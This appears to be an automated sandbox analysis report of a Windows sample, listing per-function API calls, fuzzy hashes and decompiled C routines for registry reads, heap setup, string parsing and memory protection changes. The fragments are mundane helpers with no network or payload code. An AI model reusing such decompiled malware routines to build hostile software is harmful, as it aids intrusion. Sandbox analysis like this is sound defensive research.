                                • Part of subcall function 013EA614: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,013E6096,?), ref: 013EA63A
                                • Part of subcall function 013EA614: RegEnumKeyExA.KERNELBASE(?,?,?,013E6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,013E6096), ref: 013EA681
                                • Part of subcall function 013EA614: WaitForSingleObject.KERNEL32(00000000,?,?,?,013E6096,?,013E6096,?,?,?,?,?,013E6096,?), ref: 013EA6EE
                                • Part of subcall function 013EA614: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,013E6096,?), ref: 013EA716
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                              • String ID:
                              • API String ID: 891522397-0
                              • Opcode ID: 5e017c30b072b192fd01c87ebb30cb73bb0378c3a6fa63a9a540871909e8aa06
                              • Instruction ID: 96cd7021daf0f8ea94b21542adff73b10cc6de2641d6ce616bdaf60e5958395d
                              • Opcode Fuzzy Hash: 5e017c30b072b192fd01c87ebb30cb73bb0378c3a6fa63a9a540871909e8aa06
                              • Instruction Fuzzy Hash: 1521C4B2900339ABCF30AFEC888989E7FFDAB54258F004029EB11A7180D7359D018BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E5607(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                              				long _t26;
                              				intOrPtr* _t38;
                              				char* _t42;
                              				long _t43;
                              
                              				if(_a4 == 0) {
                              					L2:
                              					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                              					_t43 = _t26;
                              					if(_t43 == 0) {
                              						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                              						if(_a4 == 0) {
                              							_t43 = 0xe8;
                              						} else {
                              							_t42 = E013E55DC(_a4);
                              							if(_t42 == 0) {
                              								_t43 = 8;
                              							} else {
                              								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                              								if(_t43 != 0) {
                              									E013E6DFA(_t42);
                              								} else {
                              									 *_a20 = _t42;
                              									_t38 = _a24;
                              									if(_t38 != 0) {
                              										 *_t38 = _a4;
                              									}
                              								}
                              							}
                              						}
                              						RegCloseKey(_a12);
                              					}
                              					L12:
                              					return _t43;
                              				}
                              				_t43 = E013E8FEC(_a4, _a8, _a12, _a16, _a20, _a24);
                              				if(_t43 == 0) {
                              					goto L12;
                              				}
                              				goto L2;
			}

                              APIs
                              • RegOpenKeyW.ADVAPI32(80000002,03AD9C46,03AD9C46), ref: 013E5640
                              • RegQueryValueExW.KERNELBASE(03AD9C46,?,00000000,80000002,00000000,00000000,?,013E49C4,3D013EC0,80000002,013E6096,00000000,013E6096,?,03AD9C46,80000002), ref: 013E5662
                              • RegQueryValueExW.ADVAPI32(03AD9C46,?,00000000,80000002,00000000,00000000,00000000,?,013E49C4,3D013EC0,80000002,013E6096,00000000,013E6096,?,03AD9C46), ref: 013E5687
                              • RegCloseKey.ADVAPI32(03AD9C46,?,013E49C4,3D013EC0,80000002,013E6096,00000000,013E6096,?,03AD9C46,80000002,00000000,?), ref: 013E56B7
                                • Part of subcall function 013E8FEC: SafeArrayDestroy.OLEAUT32(00000000), ref: 013E9071
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                              • String ID:
                              • API String ID: 486277218-0
                              • Opcode ID: f80040c795dc3a688f66f0db1d3891cfbcda62c15a43a9299264c2def80cb84b
                              • Instruction ID: 29e691cfe47f4ef48a4522b0c261e8c7f8b2f24518e21edc8544f53e8366f059
                              • Opcode Fuzzy Hash: f80040c795dc3a688f66f0db1d3891cfbcda62c15a43a9299264c2def80cb84b
                              • Instruction Fuzzy Hash: F5213E7650022EBFDF21AE98EC84CEE7BADFB14268B044025FE159B190D7319D61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,?,?,?,?,0103D0D4,80000001,?,?,80000001), ref: 01041F71
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 01041F88
                              • HeapFree.KERNEL32(00000000,00000000,?,0103D0D4,80000001,?,?,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 01041FA3
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,0103D0D4,80000001,?,?,80000001,?,?,00000000), ref: 01041FC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateFree
                              • String ID:
                              • API String ID: 4267586637-0
                              • Opcode ID: 88e513210f61a0ee0a9cd00e5dc3191630b28e06ce9f74d9f7843a2498977c39
                              • Instruction ID: e4a959d79fbc6e599685c60d5804e5a7365c885419656f4009662c69d8326951
                              • Opcode Fuzzy Hash: 88e513210f61a0ee0a9cd00e5dc3191630b28e06ce9f74d9f7843a2498977c39
                              • Instruction Fuzzy Hash: 6C113DBA900218FFDB229F98DD84CEEBBBDEB89350B104066F94593114D3716E91DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392A7
                              • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392B2
                              • _wcsupr.NTDLL ref: 010392BF
                              • lstrlenW.KERNEL32(00000000), ref: 010392C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                              • String ID:
                              • API String ID: 2533608484-0
                              • Opcode ID: 435c0b25d7d1bd035fb6902f29107c3587debfbe53bc72708cc2b9d128de2b0a
                              • Instruction ID: 934d851982c91c1aec4201edcd242234c0225ba009175344699846d3f0af5a2a
                              • Opcode Fuzzy Hash: 435c0b25d7d1bd035fb6902f29107c3587debfbe53bc72708cc2b9d128de2b0a
                              • Instruction Fuzzy Hash: 3AF050756015216BA3226A395CC8DAF76DCABD1B547100538F9C1C2004CF59CC0043A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedIncrement.KERNEL32(010500BC), ref: 01025285
                                • Part of subcall function 0103D9F4: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0103DA1F
                                • Part of subcall function 0103D9F4: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0103DA2C
                                • Part of subcall function 0103D9F4: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0103DAB8
                                • Part of subcall function 0103D9F4: GetModuleHandleA.KERNEL32(00000000), ref: 0103DAC3
                                • Part of subcall function 0103D9F4: RtlImageNtHeader.NTDLL(00000000), ref: 0103DACC
                                • Part of subcall function 0103D9F4: RtlExitUserThread.NTDLL(00000000), ref: 0103DAE1
                              • InterlockedDecrement.KERNEL32(010500BC), ref: 010252A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                              • String ID: t
                              • API String ID: 1011034841-2238339752
                              • Opcode ID: 95cce36326a1e84b5cfdf86b2bed11e8dcf8cd9ff6f49c5e48a4a08dde1a4c6b
                              • Instruction ID: 6f96dfb147d7b356537612f97c051e5b4467849265216927be314e2cf49175d5
                              • Opcode Fuzzy Hash: 95cce36326a1e84b5cfdf86b2bed11e8dcf8cd9ff6f49c5e48a4a08dde1a4c6b
                              • Instruction Fuzzy Hash: 3CE09A31385232D7D7A22AB89C04BEFBB88AB53769F004658FDCAC1085C221C4048396
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E230A(signed int __edx, void* __edi, intOrPtr _a4) {
                              				void* _t3;
                              				void* _t5;
                              				void* _t8;
                              				void* _t9;
                              				void* _t10;
                              				signed int _t11;
                              
                              				_t11 = __edx;
                              				_t3 = HeapCreate(0, 0x400000, 0); // executed
                              				 *0x13ed270 = _t3;
                              				if(_t3 == 0) {
                              					_t9 = 8;
                              					return _t9;
                              				}
                              				 *0x13ed160 = GetTickCount();
                              				_t5 = E013E2CBF(_a4);
                              				if(_t5 == 0) {
                              					E013E2EBD(_t10, __edi, _a4); // executed
                              					if(E013E3AF1(_t10) != 0) {
                              						 *0x13ed298 = 1; // executed
                              					}
                              					_t8 = E013E587D(_t11); // executed
                              					return _t8;
                              				}
                              				return _t5;
			}

                              APIs
                              • HeapCreate.KERNELBASE(00000000,00400000,00000000,013E4154,?), ref: 013E2313
                              • GetTickCount.KERNEL32 ref: 013E2327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CountCreateHeapTick
                              • String ID: Txt
                              • API String ID: 2177101570-4033135041
                              • Opcode ID: 72ea0061db9a35976eb7f66ca65754e0c727a60dad2a9e4da389a04491a3dec1
                              • Instruction ID: 5ac29e45611d10fa2e9cb88aa81ad492f01527b0dea0e933c0065aa64c77c570
                              • Opcode Fuzzy Hash: 72ea0061db9a35976eb7f66ca65754e0c727a60dad2a9e4da389a04491a3dec1
                              • Instruction Fuzzy Hash: 70E01271684329EAEB716BB49D0E71B7AEC7B1474CF100415F549D91D4EBB0D4009B15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0102EAA5
                              • memcpy.NTDLL ref: 0102EACD
                                • Part of subcall function 010309CA: NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
                                • Part of subcall function 010309CA: RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
                                • Part of subcall function 010309CA: SetLastError.KERNEL32(00000000), ref: 01030A09
                              • GetLastError.KERNEL32(00000010,00000218,01048D4D,00000100,?,00000318,00000008), ref: 0102EAE4
                              • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01048D4D,00000100), ref: 0102EBC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                              • String ID:
                              • API String ID: 685050087-0
                              • Opcode ID: b6bb8cdb160256d9f6d8986279f6b70689545429ea403a187bbd91a293202e3b
                              • Instruction ID: 63e06f3037684c98dfda62041186d24db1b37f1535eaf998e3a9310356337c66
                              • Opcode Fuzzy Hash: b6bb8cdb160256d9f6d8986279f6b70689545429ea403a187bbd91a293202e3b
                              • Instruction Fuzzy Hash: C54190B1644305AFD761DF68CC81BABBBE9FB98310F00892EF5D9C6291E730D5148B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 18%
                              			E013E301A(void* __esi) {
                              				signed int _v8;
                              				long _v12;
                              				char _v16;
                              				long* _v20;
                              				long _t36;
                              				long* _t47;
                              				intOrPtr* _t62;
                              				intOrPtr* _t63;
                              				char* _t64;
                              
                              				_t36 =  *((intOrPtr*)(__esi + 0x28));
                              				_t62 = __esi + 0x2c;
                              				_v16 = 0;
                              				 *_t62 = 0;
                              				_v12 = _t36;
                              				if(_t36 != 0) {
                              					L12:
                              					return _v12;
                              				}
                              				_v8 = 4;
                              				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                              				if(_t36 == 0) {
                              					L11:
                              					_v12 = GetLastError();
                              					goto L12;
                              				}
                              				_push( &_v16);
                              				_push( &_v8);
                              				_push(_t62);
                              				_t63 = __imp__; // 0x703bfd20
                              				_push(0);
                              				_push(0x20000013);
                              				_push( *((intOrPtr*)(__esi + 0x18)));
                              				if( *_t63() == 0) {
                              					goto L11;
                              				} else {
                              					_v16 = 0;
                              					_v8 = 0;
                              					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                              					_t47 = E013E55DC(_v8 + 2);
                              					_v20 = _t47;
                              					if(_t47 == 0) {
                              						_v12 = 8;
                              					} else {
                              						_push( &_v16);
                              						_push( &_v8);
                              						_push(_t47);
                              						_push(0);
                              						_push(0x16);
                              						_push( *((intOrPtr*)(__esi + 0x18)));
                              						if( *_t63() == 0) {
                              							_v12 = GetLastError();
                              						} else {
                              							_v8 = _v8 >> 1;
                              							 *((short*)(_v20 + _v8 * 2)) = 0;
                              							_t64 = E013E55DC(_v8 + 1);
                              							if(_t64 == 0) {
                              								_v12 = 8;
                              							} else {
                              								wcstombs(_t64, _v20, _v8 + 1);
                              								 *(__esi + 0xc) = _t64;
                              							}
                              						}
                              						E013E6DFA(_v20);
                              					}
                              					goto L12;
                              				}
			}

                              APIs
                              • GetLastError.KERNEL32 ref: 013E310C
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • wcstombs.NTDLL ref: 013E30DA
                              • GetLastError.KERNEL32 ref: 013E30F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLast$AllocateHeapwcstombs
                              • String ID:
                              • API String ID: 2631933831-0
                              • Opcode ID: c2a785eb448df9640decc1aa4d421ded9dba37481a12d62d5bc1bedb4e3c129d
                              • Instruction ID: 5c44072425385c70e7f36371b77ee1e02cfc4c49e1a8929696802097b5dee9d0
                              • Opcode Fuzzy Hash: c2a785eb448df9640decc1aa4d421ded9dba37481a12d62d5bc1bedb4e3c129d
                              • Instruction Fuzzy Hash: 5F310CB5900319EFDB20DF99C885AAEBBFCFB18348F104569E502E3291DB719A449F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103A02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,0103D07F,?,00000000,?,?,?,01022E53,80000001), ref: 0103A063
                                • Part of subcall function 0103A02D: lstrcpy.KERNEL32(00000000,00000000), ref: 0103A087
                                • Part of subcall function 0103A02D: lstrcat.KERNEL32(00000000,00000000), ref: 0103A08F
                              • RegOpenKeyExA.KERNELBASE(01022E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D09F
                              • RegOpenKeyExA.ADVAPI32(01022E53,01022E53,00000000,00020019,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0B5
                              • RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Open$Closelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 4131162436-0
                              • Opcode ID: 235944140e6a9a08f21c06cc66fd41da5e555dc24ad204f7c97fd7019bed43f9
                              • Instruction ID: 612d495297f91649dff8cbf0e481c7c80bd1293ad1e9b4159abcc07eaad737e6
                              • Opcode Fuzzy Hash: 235944140e6a9a08f21c06cc66fd41da5e555dc24ad204f7c97fd7019bed43f9
                              • Instruction Fuzzy Hash: 9221FCB5900209BFDB11DF98DCC0DEEBBBCEB55244B1040B6F640E2115E771AE559B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 79%
                              			E013E456E(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                              				char _v5;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				char _t28;
                              				void* _t33;
                              				void* _t38;
                              				void* _t45;
                              				char* _t46;
                              				void* _t48;
                              				char* _t56;
                              				char* _t57;
                              				intOrPtr _t59;
                              				void* _t60;
                              
                              				_t56 = _a4;
                              				_t60 = __eax;
                              				_v12 = 0xb;
                              				if(_t56 != 0 && __eax != 0) {
                              					_t5 = _t60 - 1; // -1
                              					_t46 =  &(_t56[_t5]);
                              					_t28 =  *_t46;
                              					_v5 = _t28;
                              					 *_t46 = 0;
                              					__imp__(_a8, _t45);
                              					_v16 = _t28;
                              					_t57 = StrStrA(_t56, _a8);
                              					if(_t57 != 0) {
                              						 *_t46 = _v5;
                              						_t33 = RtlAllocateHeap( *0x13ed270, 0, _a16 + _t60); // executed
                              						_t48 = _t33;
                              						if(_t48 == 0) {
                              							_v12 = 8;
                              						} else {
                              							_t58 = _t57 - _a4;
                              							E013EAA99(_t57 - _a4, _a4, _t48);
                              							_t38 = E013EAA99(_a16, _a12, _t58 + _t48);
                              							_t53 = _v16;
                              							_t59 = _a16;
                              							E013EAA99(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                              							 *_a20 = _t48;
                              							_v12 = _v12 & 0x00000000;
                              							 *_a24 = _t60 - _v16 + _t59;
                              						}
                              					}
                              				}
                              				return _v12;
                              			}

                              APIs
                              • lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 013E45A2
                              • StrStrA.SHLWAPI(00000000,?), ref: 013E45AF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 013E45CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 556738718-0
                              • Opcode ID: 4a04619fea244913a995788b7f9a0b2216ece91d671cc5454573c439fa2b2467
                              • Instruction ID: bdae6885671caff877f5e19f0771ef58e2544957f019bcd83008330e4abf2e3c
                              • Opcode Fuzzy Hash: 4a04619fea244913a995788b7f9a0b2216ece91d671cc5454573c439fa2b2467
                              • Instruction Fuzzy Hash: 22217C3560021AAFDB21CFACD888B9EBFF9EF89215F048155E904AB345C734E915CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 47%
                              			E013E311C(char* _a4, char** _a8) {
                              				char* _t7;
                              				char* _t11;
                              				char* _t14;
                              				char* _t16;
                              				char* _t17;
                              				char _t18;
                              				signed int _t20;
                              				signed int _t22;
                              
                              				_t16 = _a4;
                              				_push(0x20);
                              				_t20 = 1;
                              				_push(_t16);
                              				while(1) {
                              					_t7 = StrChrA();
                              					if(_t7 == 0) {
                              						break;
                              					}
                              					_t20 = _t20 + 1;
                              					_push(0x20);
                              					_push( &(_t7[1]));
                              				}
                              				_t11 = E013E55DC(_t20 << 2);
                              				_a4 = _t11;
                              				if(_t11 != 0) {
                              					StrTrimA(_t16, 0x13ec2a4); // executed
                              					_t22 = 0;
                              					do {
                              						_t14 = StrChrA(_t16, 0x20);
                              						if(_t14 != 0) {
                              							 *_t14 = 0;
                              							do {
                              								_t14 =  &(_t14[1]);
                              								_t18 =  *_t14;
                              							} while (_t18 == 0x20 || _t18 == 9);
                              						}
                              						_t17 = _a4;
                              						 *(_t17 + _t22 * 4) = _t16;
                              						_t22 = _t22 + 1;
                              						_t16 = _t14;
                              					} while (_t14 != 0);
                              					 *_a8 = _t17;
                              				}
                              				return 0;
                              			}

                              APIs
                              • StrChrA.SHLWAPI(?,00000020,00000000,03AD95AC,?,?,013E3A64,?,03AD95AC), ref: 013E3138
                              • StrTrimA.KERNELBASE(?,013EC2A4,00000002,?,013E3A64,?,03AD95AC), ref: 013E3156
                              • StrChrA.SHLWAPI(?,00000020,?,013E3A64,?,03AD95AC), ref: 013E3161
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Trim
                              • String ID:
                              • API String ID: 3043112668-0
                              • Opcode ID: 8c99734fbec38ab9e1f3b3da2d55f87340a8b6a6ddaf264addccf1d623f910c1
                              • Instruction ID: d4a0cef539ccadce687c2408b4e7800290a44cd0f16eeb1252160efebae0f440
                              • Opcode Fuzzy Hash: 8c99734fbec38ab9e1f3b3da2d55f87340a8b6a6ddaf264addccf1d623f910c1
                              • Instruction Fuzzy Hash: F9017171304365AEE7206A6E8C4CFA76FEDFB89698F045029FA55CB2C2D674D842C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32 ref: 010230C3
                              • VirtualProtect.KERNELBASE(?,00000004,00000040,80000000), ref: 010230DD
                              • VirtualProtect.KERNELBASE(?,00000004,80000000,80000000,?,00000004,00000040,80000000), ref: 01023110
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$lstrlen
                              • String ID:
                              • API String ID: 386137988-0
                              • Opcode ID: 7e285358d500d8a44063810dde9760ace3a58ac5b6077e7023f5c61644cd6e38
                              • Instruction ID: cb6d0940b58138de9618bfb449af290884ef2b9f5477c1af61e6c7d8ba1c59d1
                              • Opcode Fuzzy Hash: 7e285358d500d8a44063810dde9760ace3a58ac5b6077e7023f5c61644cd6e38
                              • Instruction Fuzzy Hash: CD114F75900218EFEB11CF48C481F9E7FB8FF08350F108085F9859B105C379DA808BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E013E62E1(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				intOrPtr _v36;
                              				intOrPtr _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				void _v60;
                              				char _v64;
                              				long _t14;
                              				intOrPtr _t18;
                              				intOrPtr _t19;
                              				intOrPtr _t26;
                              				intOrPtr _t27;
                              				long _t28;
                              
                              				_t27 = __edi;
                              				_t26 = _a8;
                              				_t14 = E013E6FB2(_a4, _t26, __edi); // executed
                              				_t28 = _t14;
                              				if(_t28 != 0) {
                              					memset( &_v60, 0, 0x38);
                              					_t18 =  *0x13ed2b8; // 0x26ea5a8
                              					_t28 = 0;
                              					_v64 = 0x3c;
                              					if(_a12 == 0) {
                              						_t7 = _t18 + 0x13ee4e8; // 0x70006f
                              						_t19 = _t7;
                              					} else {
                              						_t6 = _t18 + 0x13ee8d0; // 0x750072
                              						_t19 = _t6;
                              					}
                              					_v52 = _t19;
                              					_push(_t28);
                              					_v48 = _a4;
                              					_v44 = _t26;
                              					_v36 = _t27;
                              					E013E2522();
                              					_push( &_v64);
                              					if( *0x13ed0e4() == 0) {
                              						_t28 = GetLastError();
                              					}
                              					_push(1);
                              					E013E2522();
                              				}
                              				return _t28;
                              			}

                              APIs
                                • Part of subcall function 013E6FB2: SysAllocString.OLEAUT32(00000000), ref: 013E700E
                                • Part of subcall function 013E6FB2: SysAllocString.OLEAUT32(0070006F), ref: 013E7022
                                • Part of subcall function 013E6FB2: SysAllocString.OLEAUT32(00000000), ref: 013E7034
                                • Part of subcall function 013E6FB2: SysFreeString.OLEAUT32(00000000), ref: 013E7098
                              • memset.NTDLL ref: 013E6304
                              • GetLastError.KERNEL32 ref: 013E6350
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Alloc$ErrorFreeLastmemset
                              • String ID: <
                              • API String ID: 1330562889-4251816714
                              • Opcode ID: b792a5ee89473294297559ef9c5dd3647de8e50d02d0db7c8a002740fe1474bd
                              • Instruction ID: dccb8c1f2fbcda4341dccad1efe7a1f673ebf6432e84553f0473bb99a7ddd5bb
                              • Opcode Fuzzy Hash: b792a5ee89473294297559ef9c5dd3647de8e50d02d0db7c8a002740fe1474bd
                              • Instruction Fuzzy Hash: 990144B1900328EBDB21EFA8D849EDEBBFCAB18754F444426F905EB1D1D770D9048B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                              • RegOpenKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364FD
                              • lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: cb264d8977172456c62f1b40557c5a4ff2f4e633249caa584bddd9e918578582
                              • Instruction ID: a18dac9c2b5a012a9a3a58848f041e7ee0c429719835efea63dea40f5888da14
                              • Opcode Fuzzy Hash: cb264d8977172456c62f1b40557c5a4ff2f4e633249caa584bddd9e918578582
                              • Instruction Fuzzy Hash: ADF068BA100114FFE7115F94DC94F9B7BACEB85790F10415AF98185144D671D640C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetEvent.KERNEL32(00000760,0103161F), ref: 0104250B
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 010422D3
                                • Part of subcall function 010422AA: RtlDeleteCriticalSection.NTDLL(01050440), ref: 01042306
                                • Part of subcall function 010422AA: RtlDeleteCriticalSection.NTDLL(01050460), ref: 0104230D
                                • Part of subcall function 010422AA: ReleaseMutex.KERNEL32(00000768,00000000,?,?,?,01042516), ref: 01042335
                                • Part of subcall function 010422AA: CloseHandle.KERNEL32(?,?,01042516), ref: 01042341
                                • Part of subcall function 010422AA: ResetEvent.KERNEL32(00000000,00000000,?,?,?,01042516), ref: 0104234D
                                • Part of subcall function 010422AA: CloseHandle.KERNEL32(?,?,01042516), ref: 01042359
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 0104235F
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 01042373
                                • Part of subcall function 010422AA: HeapFree.KERNEL32(00000000,00000000,?,?,01042516), ref: 01042396
                                • Part of subcall function 010422AA: RtlRemoveVectoredExceptionHandler.NTDLL(00F9D858), ref: 010423D0
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 010423DF
                              • CloseHandle.KERNEL32(00000760), ref: 01042520
                              • HeapDestroy.KERNELBASE(04740000), ref: 01042530
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                              • String ID:
                              • API String ID: 2773679374-0
